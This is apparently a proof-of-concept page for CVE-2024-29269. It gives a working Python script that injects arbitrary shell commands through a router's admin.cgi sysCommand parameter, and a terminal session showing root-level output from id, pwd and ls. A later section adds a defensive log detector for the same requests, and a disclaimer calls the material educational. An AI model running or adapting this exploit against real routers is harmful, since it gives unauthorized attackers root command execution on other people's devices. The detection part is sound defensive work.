- CVE: CVE-2024-29269
- Severity: Critical
- Details/Reference: https://github.com/wutalent/CVE-2024-29269/blob/main/index.md (archive)
File: script.py

```python
import sys
import requests
import xml.etree.ElementTree as ET


def get_systemutil_response(url, command, proxy):
    # The command is passed in the Cmd parameter of admin.cgi's sysCommand handler.
    endpoint = f"/cgi-bin/admin.cgi?Command=sysCommand&Cmd={command}"
    full_url = url.rstrip('/') + endpoint
    headers = {
        'Referer': url,
    }
    try:
        response = requests.get(full_url, headers=headers, proxies=proxy)
        if response.status_code == 200:
            print("Response from", full_url)
            #print(response.text)
            # The device answers with XML; command output is in <CmdResult> elements.
            root = ET.fromstring(response.text)
            for cmd_result in root.findall('CmdResult'):
                # An empty <CmdResult/> has text None, so guard before strip().
                data = (cmd_result.text or "").strip()
                print(data)
        else:
            print("Error: Failed to fetch data. Status code:", response.status_code)
    except requests.exceptions.RequestException as e:
        print("Error:", e)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python script.py <url> <command>")
        sys.exit(1)
    url = sys.argv[1]
    command = sys.argv[2]
    # Requests are routed through a local intercepting proxy on port 8080.
    proxy = {
        'http': 'http://127.0.0.1:8080',
        'https': 'https://127.0.0.1:8080',
    }
    get_systemutil_response(url, command, proxy)
```
To run the script, use the following commands:

```
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py
Usage: python script.py <url> <command>
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ id
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id
uid=0(admin) gid=0(admin)
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ pwd
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=pwd
/etc_ro/lighttpd/www/cgi-bin
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ "ls -al"
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls -al
-rwxrwxr-x 1 1000 1000 xxxxxx web
-rwxrwxr-x 1 1000 1000 xxxxx update.cgi
-rwxrwxr-x 1 1000 1000 xxxxx lte.cgi
-rwxrwxr-x 1 1000 1000 xxx ExportTrafficLog.sh
-rwxrwxr-x 1 1000 1000 xxxxx nms.cgi
-rwxrwxr-x 1 1000 1000 xxxxx admin.cgi
-rwxrwxr-x 1 1000 1000 xxxxx bip.cgi
-rwxrwxr-x 1 1000 1000 xxxxx systemutil.cgi
-rwxrwxr-x 1 1000 1000 xxxxx wireless.cgi
-rwxrwxr-x 1 1000 1000 xxx ExportvpnLog.sh
-rwxrwxr-x 1 1000 1000 xxxxx serialmodem.cgi
-rwxrwxr-x 1 1000 1000 xxxxx modem.cgi
-rwxrwxr-x 1 1000 1000 xxxxx traffic.cgi
-rwxrwxr-x 1 1000 1000 xxxxx firewall.cgi
-rwxrwxr-x 1 1000 1000 xxx ExportSettings.sh
-rwxrwxr-x 1 1000 1000 xxxxx serial.cgi
-rwxrwxr-x 1 1000 1000 xxxxx gmmp.cgi
-rwxrwxr-x 1 1000 1000 xxxxx internet.cgi
-rw-r--r-- 1 0 0 0 xx.txt
-rw-r--r-- 1 0 0 xx xxyyzz.txt
-rwxrwxrwx 1 0 0 xxxxxxx linux-mips
drwxrwxr-x 21 1000 1000 0 ..
drwxrwxr-x 2 1000 1000 0 .
```
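
On the defensive side, the request shape shown above (`/cgi-bin/admin.cgi` with `Command=sysCommand` and a `Cmd` parameter) can be searched for in HTTP logs. The detector below is an added example, not part of the original repository; it assumes combined-format access logs from a reverse proxy or network sensor in front of the device, and every log line in it is constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Combined-log-format entry (assumed format; adjust to your proxy or sensor).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[0-9.]+" (?P<status>\d{3})'
)

# Constructed sample lines; "getStatus" is a made-up benign Command value.
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Apr/2024:10:15:01 +0000] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1" 200 112',
    '198.51.100.7 - - [02/Apr/2024:10:15:09 +0000] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls%20-al HTTP/1.1" 200 1480',
    '192.0.2.10 - - [02/Apr/2024:10:16:30 +0000] "GET /cgi-bin/admin.cgi?Command=getStatus HTTP/1.1" 200 310',
    '192.0.2.10 - - [02/Apr/2024:10:17:02 +0000] "GET /index.html HTTP/1.1" 200 2048',
    '198.51.100.7 - - [02/Apr/2024:10:18:44 +0000] "GET //cgi-bin/admin.cgi?%43ommand=sysCommand&Cmd=pwd HTTP/1.1" 403 0',
]


def find_syscommand_requests(lines):
    """Return one record per request to admin.cgi carrying Command=sysCommand."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Split by hand: urlsplit() would treat a leading "//" as a host name.
        raw_path, _, query = m["target"].partition("?")
        path = re.sub(r"/+", "/", unquote(raw_path))
        if not path.endswith("/cgi-bin/admin.cgi"):
            continue
        # parse_qs percent-decodes names and values, so encoded variants match.
        params = {k.lower(): v for k, v in parse_qs(query).items()}
        if "syscommand" not in (c.lower() for c in params.get("command", [])):
            continue
        hits.append({
            "src": m["src"],
            "time": m["ts"],
            "status": int(m["status"]),  # 200: the device answered the request
            "cmd": " ".join(params.get("cmd", [])),
        })
    return hits


if __name__ == "__main__":
    for hit in find_syscommand_requests(SAMPLE_LOG):
        print(hit)
```

Hits with status 200 deserve priority, since the session above shows command output returned in a successful response.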
This code and associated instructions are provided for educational purposes only. Unauthorized use for malicious intent, including but not limited to unauthorized access to computer systems, networks, or data, is strictly prohibited. The author disclaims any responsibility for misuse of the code or any negative consequences resulting from its use. Users are advised to adhere to ethical and legal standards when utilizing or experimenting with the provided code. It is recommended to obtain explicit permission before attempting to run this code on any systems or networks that are not owned or managed by the user.